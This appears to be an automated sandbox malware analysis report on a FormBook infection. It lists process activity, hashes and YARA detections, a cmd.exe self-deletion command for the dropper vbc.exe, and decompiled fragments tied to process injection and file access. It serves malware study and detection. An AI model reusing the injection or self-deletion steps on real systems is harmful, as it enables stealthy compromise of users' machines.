0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 2964

General

Start time:	20:23:36
Start date:	02/03/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: colorcpl.exe PID: 1572 Parent PID: 1388

General

Start time:	20:23:47
Start date:	02/03/2021
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\colorcpl.exe
Imagebase:	0xbc0000
File size:	86016 bytes
MD5 hash:	031183B7923637CBB3E99CBBE5E821CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 1756 Parent PID: 1572

General

Start time:	20:23:51
Start date:	02/03/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4a470000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2688 Parent PID: 2504 vbc.exeCOMMON

Executed Functions

Function 001E61BF, Relevance: 1.8, Strings: 1, Instructions: 526COMMON

Download Yara Rule

Strings

.@l, xrefs: 001E62A5

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: .@l
API String ID: 0-2179369065
Opcode ID: a888140f1735bb0545bc26ec0d024a7a331e9329bb5e447cfa0f4701629d79b1
Instruction ID: 5b3db6758d7539f7c20714a7239ee41b92147dbb8439017b6f0e338bb13be3bb
Opcode Fuzzy Hash: a888140f1735bb0545bc26ec0d024a7a331e9329bb5e447cfa0f4701629d79b1
Instruction Fuzzy Hash: 4E02F030F006549FCB08DBB5D894AAEB7B6AFC9348F508629E405DB399DF31DD068B91

Uniqueness

Uniqueness Score: -1.00%

Function 001E2E58, Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,001E2D77,00000000,00000000), ref: 001E2EC8

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 38b2d157bdb0eb9b2f4b76b1a3e0c648c7b0e0fda6c6b0b8c0152fb796a1ffab
Instruction ID: f111a604c5a6740385030fb7606f54cc537db72ad302599ba3777c7307a25af5
Opcode Fuzzy Hash: 38b2d157bdb0eb9b2f4b76b1a3e0c648c7b0e0fda6c6b0b8c0152fb796a1ffab
Instruction Fuzzy Hash: A111F6759006589FCB10CF9AD888BDEBBF8EB89310F14885AE458B7250C775A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E1574, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,001E2D77,00000000,00000000), ref: 001E2EC8

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 11eef0211977d380852dbe7be53a15e61cda08bcbe25442b10adb370f76f2822
Instruction ID: a57180613caf9d94b6f12227e32a3719958d3ceb4b3bd1882ad2901792e6786e
Opcode Fuzzy Hash: 11eef0211977d380852dbe7be53a15e61cda08bcbe25442b10adb370f76f2822
Instruction Fuzzy Hash: 031126759006589FCB10CFDAC848BDEBBF8EB89310F148819E418B7210C374A940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E53A1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 001E5350

Strings

48.m, xrefs: 001E53D4

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID: 48.m
API String ID: 3559483778-1282478091
Opcode ID: 8b3dd6c8436c9a34e9c732240e4aa3a919bf476d78ad4dbdbdaa7301af1ebe4d
Instruction ID: 42675325493a0eb4b29b0d3e932185cb7f435099c96eb7f9cb383cd73e51504b
Opcode Fuzzy Hash: 8b3dd6c8436c9a34e9c732240e4aa3a919bf476d78ad4dbdbdaa7301af1ebe4d
Instruction Fuzzy Hash: 36312831E00A499FCB18DFA5C8417DEF7F2FF85344F214529E405AB281EBB46981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001E4D4D, Relevance: 1.9, APIs: 1, Instructions: 397memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001E506E

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8e11a0d4ab761af5b28d924d09da5f7fae18a8a649ce6fd86a9d1ca07032acf7
Instruction ID: b17ec7a46268e7e5c18318cee7aedb577ae0e6218933fbfeedf7f8e98443273c
Opcode Fuzzy Hash: 8e11a0d4ab761af5b28d924d09da5f7fae18a8a649ce6fd86a9d1ca07032acf7
Instruction Fuzzy Hash: F421F7718083889FCB11CFA5C8547DFBFF1AF46314F14889AE445AB292C7799914CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E5B48, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001E5D7E

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2b89b88062a927866b4dc62dabcbefef36555ae30d5f73348333d610fa21e653
Instruction ID: a2fa0d17676d4e723bffc5eca5730032c88a17fed41b3b0df3986a5e87a2b889
Opcode Fuzzy Hash: 2b89b88062a927866b4dc62dabcbefef36555ae30d5f73348333d610fa21e653
Instruction Fuzzy Hash: 49918A71D00B598FDF20CFA5C8517EEBBB6BF48308F148569E818A7280DB749A81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001E7020, Relevance: 1.7, APIs: 1, Instructions: 230COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 001E7079

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3a6042703a24dd46c197cdb5b43cd5f1450b7c9aa297c0e034473e9e41de2e55
Instruction ID: 0eada3fcfff964cdd21abc417290a56809c53714f8b1f005b70c42c12eb7c25a
Opcode Fuzzy Hash: 3a6042703a24dd46c197cdb5b43cd5f1450b7c9aa297c0e034473e9e41de2e55
Instruction Fuzzy Hash: F6A17974D0464A9FEB58EFAAD8857DCBBB2BF88315F188119D411AB3D0D734E884DB24

Uniqueness

Uniqueness Score: -1.00%

Function 001E6D47, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 001E6FCE

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: KernelObjectSecurity
String ID:
API String ID: 3015937269-0
Opcode ID: 7c00ff8009b27721b996e30510c9f080d7f5fd47f776268305a5e11bea4b2962
Instruction ID: 4467d75e3a21c098e17042652dc69e33746a34733618f0a7cc29148b744b1053
Opcode Fuzzy Hash: 7c00ff8009b27721b996e30510c9f080d7f5fd47f776268305a5e11bea4b2962
Instruction Fuzzy Hash: 9171F170A052889FCB05CFF9C854BDEBFB1BF86314F44456AE465AB3A1C7389A44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001E701A, Relevance: 1.7, APIs: 1, Instructions: 156COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 001E7079

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7f5772806a1be935e085dca7786aa3f462e7d89820d69314c4e1994d8f486b3f
Instruction ID: b576bb6d1e445dbede48ce43004da1f175f715e267856281e4f5613269cb875d
Opcode Fuzzy Hash: 7f5772806a1be935e085dca7786aa3f462e7d89820d69314c4e1994d8f486b3f
Instruction Fuzzy Hash: 57616A70D04649DFEB58DFAAD8857DCBBB2BF88314F288119D411AB380D775E845DB24

Uniqueness

Uniqueness Score: -1.00%

Function 001E52C0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 001E5350

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c7cc99cd1cf93292acb20413580e092accd15183d5aa996b8c167896be8f257f
Instruction ID: 2166bca3ffe7aa9fbc5d4e38c211e1a84f79dbe05d919505c6c5c0a5da744633
Opcode Fuzzy Hash: c7cc99cd1cf93292acb20413580e092accd15183d5aa996b8c167896be8f257f
Instruction Fuzzy Hash: 862139759007499FCB10CFA9C884BDEBBF5FF48314F54882AE919A7240D7B89A40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E55AE, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001E5630

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 7502ac21e5cddcf6d1db0b81461fc062954c5ae5efc5a4ac336a2e99e665dce6
Instruction ID: acec4c6cab3c92532651017314479b76315e858d4bded15c54f2a4fcf5709771
Opcode Fuzzy Hash: 7502ac21e5cddcf6d1db0b81461fc062954c5ae5efc5a4ac336a2e99e665dce6
Instruction Fuzzy Hash: 9D212A759006499FCB10CFA9D884BDEFBF5FF48314F50882AE519A7250D7789940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E55B0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001E5630

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2eb247bc250da468bf0cc35991009aef7d3d125dbb09fe08e4996d5edde127ee
Instruction ID: fad2d99774d5221ba2ccf025e553f6d5ec7875331c0e5b508622b27d0172c08e
Opcode Fuzzy Hash: 2eb247bc250da468bf0cc35991009aef7d3d125dbb09fe08e4996d5edde127ee
Instruction Fuzzy Hash: B32128759006499FCB10CFAAD884BDEFBF5FF48314F50882AE919A7240D7789940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E4320, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 001E439E

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e9227cdd440fc09cd6cc8fea32115788044d418b30ec0e155c8a50c3553e8e43
Instruction ID: 25065cfa40a140dcceb9a9130109a8c4f02d3e7be8cd681dae84c7a051ed6d28
Opcode Fuzzy Hash: e9227cdd440fc09cd6cc8fea32115788044d418b30ec0e155c8a50c3553e8e43
Instruction Fuzzy Hash: 0D2138759006088FCB10CFAAC4847EEBBF4FF89314F54882AD819B7240D778AA44CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E6F50, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 001E6FCE

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: KernelObjectSecurity
String ID:
API String ID: 3015937269-0
Opcode ID: 79bf76100a665ff7a9f6192ec526a2d069b3343dd83a9c1b6cad1253834c2001
Instruction ID: 5774b5c3cc749ba70e515688bc14c3ea685c3f67140dfdf7c816fa7093d6463a
Opcode Fuzzy Hash: 79bf76100a665ff7a9f6192ec526a2d069b3343dd83a9c1b6cad1253834c2001
Instruction Fuzzy Hash: 542129759106498FCB10CF9AD485BDEBBF4EF88314F54842AE419B7340D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E5000, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001E506E

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 28b8b64bcb9f05243af9b4e6bae78aabdb7903bdf670ebc718f33f80bcfcf952
Instruction ID: 928e4564637ff8f89ed774c581f534ea6d83ac85adf5e2ac56484ac8ad817067
Opcode Fuzzy Hash: 28b8b64bcb9f05243af9b4e6bae78aabdb7903bdf670ebc718f33f80bcfcf952
Instruction Fuzzy Hash: 311137759006489FCB10DFAAD844BDFFBF5AF88324F14881AE515B7250C775AA40CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E6118, Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 001E6182

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fffbaecc8530c43e0160094f7d119e69dfa14e4c9ff38c632a14a234f81e9094
Instruction ID: 37a2714d2fdafdef2d85521f2987a5727b313102f0ce84c69f8f05f0460ac02f
Opcode Fuzzy Hash: fffbaecc8530c43e0160094f7d119e69dfa14e4c9ff38c632a14a234f81e9094
Instruction Fuzzy Hash: 1A115875D002488FCB10DFAAD8447DFFBF9AF89324F24881AD419B7240CB78A940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E6120, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 001E6182

Memory Dump Source

Source File: 00000004.00000002.2376004921.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 01b174268b18d732a2c5c8b681fc0c3b26a2971e488b96d6cb738df41d7e23c1
Instruction ID: 591c14dc8c7bd57803ecd818740913a9a487e51b7454c381e20347a23181324f
Opcode Fuzzy Hash: 01b174268b18d732a2c5c8b681fc0c3b26a2971e488b96d6cb738df41d7e23c1
Instruction Fuzzy Hash: EC113675D006488FCB10DFAAD8447DFFBF9AF89324F24881AD519B7240DB79A940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000BD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2375895070.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9460e64cf73ce22ec751b4afb3f27c786ae800c0aacbf2fee7c5f0d112cf881e
Instruction ID: dffe350e1d3656167c76c1086861bfb397c12f7c7e29ad0c2f691e568dddcc98
Opcode Fuzzy Hash: 9460e64cf73ce22ec751b4afb3f27c786ae800c0aacbf2fee7c5f0d112cf881e
Instruction Fuzzy Hash: 3921F575614204DFCB24EF64D8C4B5AFBA5EB84318F24C9AAE8094B246D33AD847DA61

Uniqueness

Uniqueness Score: -1.00%

Function 000BD006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2375895070.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e51c62b6b2360986d573e45d4f8a8d463ded67677215c349d578b27573575935
Instruction ID: 7ad3d9ca323ebe1370cb5bb8f1d0efbece1cfbead348cb451247f6540e1bbb04
Opcode Fuzzy Hash: e51c62b6b2360986d573e45d4f8a8d463ded67677215c349d578b27573575935
Instruction Fuzzy Hash: C7217F754083809FCB02CF14D994B15BFB1EB46314F28C5EBD8498B266D33A9816CB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 2964 Parent PID: 2688 vbc.exeCOMMON

Executed Functions

Function 00419DFA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: 459ebfd9f29944af4d953822bc4405f23908643d7a0b09853680ff40b4a9794c
Instruction ID: 214786878c82e36c394b4efaec9d24ac18e061b3af95df4184987aedccfa5c9b
Opcode Fuzzy Hash: 459ebfd9f29944af4d953822bc4405f23908643d7a0b09853680ff40b4a9794c
Instruction Fuzzy Hash: 6FF01DB6210145AFCB14DF9DD890CEB7BA9AF8C224B05864DFD5DA7201C634E855CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e03
0x00419e0f
0x00419e17
0x00419e22
0x00419e3d
0x00419e45
0x00419e49

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D4D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00419D4D(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;

				asm("cmpsb");
				asm("sbb al, 0x55");
				_t17 = _a4;
				_t3 = _t17 + 0xc40; // 0xc40
				E0041A950(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t23 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}

0x00419d4e
0x00419d4f
0x00419d53
0x00419d5f
0x00419d67
0x00419d89
0x00419d9d
0x00419da1

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: 611bb8a7d7c728eb440feb8cd8cf012d1dfe3f4b59a96f2bdf01c61a89520726
Instruction ID: 6a177ab58570eb37dcceb2feadd63d5f460050e8057e2a6204f757365139cc7b
Opcode Fuzzy Hash: 611bb8a7d7c728eb440feb8cd8cf012d1dfe3f4b59a96f2bdf01c61a89520726
Instruction Fuzzy Hash: D101FDB2211208AFCB08CF98DC85EEB37ADAF8C714F018608FA1D97240C630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d5f
0x00419d67
0x00419d89
0x00419d9d
0x00419da1

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C640( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCE0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_push(_v8);
					_t18 = E0041AE90();
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acdc
0x0040acdf
0x0040ace4
0x0040ace9
0x0040acf3
0x0040acf8
0x0040acfb
0x0040acfd
0x0040ad05
0x0040ad0a
0x0040ad0a
0x0040ad10
0x0040ad11
0x0040ad19
0x0040ad1c
0x0040ad1e
0x0040ad32
0x00000000
0x0040ad34
0x0040ad3a
0x0040acee
0x0040acee
0x0040acee

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00419E7A, Relevance: 1.5, APIs: 1, Instructions: 33
nativeCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00419E7A(void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				void* _t6;
				long _t11;
				void* _t15;
				void* _t18;
				intOrPtr* _t19;

				asm("fnstcw word [edi]");
				if(__eflags <= 0) {
					return  *((intOrPtr*)( *_t19))(_a12, _t6, _t15, 0x10);
				} else {
					_t8 = _a4;
					_t2 = _t8 + 0x10; // 0x300
					_push(_t19);
					_t3 = _t8 + 0xc50; // 0x40a913
					E0041A950(_t18, _a4, _t3,  *_t2, 0, 0x2c);
					_t11 = NtClose(_a8); // executed
					return _t11;
				}
			}

0x00419e7c
0x00419e7e
0x00419eed
0x00419e80
0x00419e83
0x00419e86
0x00419e89
0x00419e8f
0x00419e97
0x00419ea5
0x00419ea9
0x00419ea9

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 2c98de79fc0579a5de5d46572eb6e491ae68aa77f2b859020e4d6ff046bda885
Instruction ID: a1c53b8f3462070534ed401da380c279d1a6d761b3227d31a4c7e4992eb56c4e
Opcode Fuzzy Hash: 2c98de79fc0579a5de5d46572eb6e491ae68aa77f2b859020e4d6ff046bda885
Instruction Fuzzy Hash: 64E0A9B2200204BBD710EB9DDC42EE7BBADEF88720F10854AFA0C87242C630F90086A0

Uniqueness

